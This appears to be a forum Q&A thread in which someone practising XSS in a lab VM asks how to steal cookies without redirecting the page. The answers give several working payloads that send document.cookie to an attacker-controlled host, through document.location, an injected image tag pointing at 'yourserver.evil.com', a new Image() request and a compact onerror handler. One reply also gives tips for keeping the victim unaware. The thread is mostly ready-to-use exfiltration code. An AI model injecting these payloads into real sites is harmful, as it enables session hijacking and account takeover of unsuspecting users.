XSS cookie stealing without redirecting to another page
I'm practicing in VM following the OWASP guide. I know that is possible to steal the cookie by redirecting to "False" page etc. but I would like to steal the cookie without redirecting on another page.
So, if you have some guestbook and then you put:
document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie
How can I put this into existing page without redirecting?
Basically, what I want is when someone clicks on the link, grab the cookie and print it somewhere on the current page. Maybe in some
alttag or whatever.
Google changed the way cookies are written. I can't get session cookies using the above method.
document.write('cookie: ' + document.cookie)
If you want it sent to another server, you could include it in a non-existent image:
document.write('<img src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />')
And you can even request it without writing to `document`: `image = new Image(); image.src='http://example.com?c='+document.cookie;`
I cannot edit your post but there is a missing quote, `/>)` should be `/>')`. Thanks anyway excellent answer
To add onto Steve's answer, there are many different ways to achieve this. If your intention is to not have the user be aware of the stolen cookie, I would suggest the
<img>attack Steve suggested. Although I prefer avoiding the document.write since it uses up so many characters:
<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>
This is nice and compact, but the problem is that it will recursively trigger the `onerror` handler unless an image is served from the attacker's page.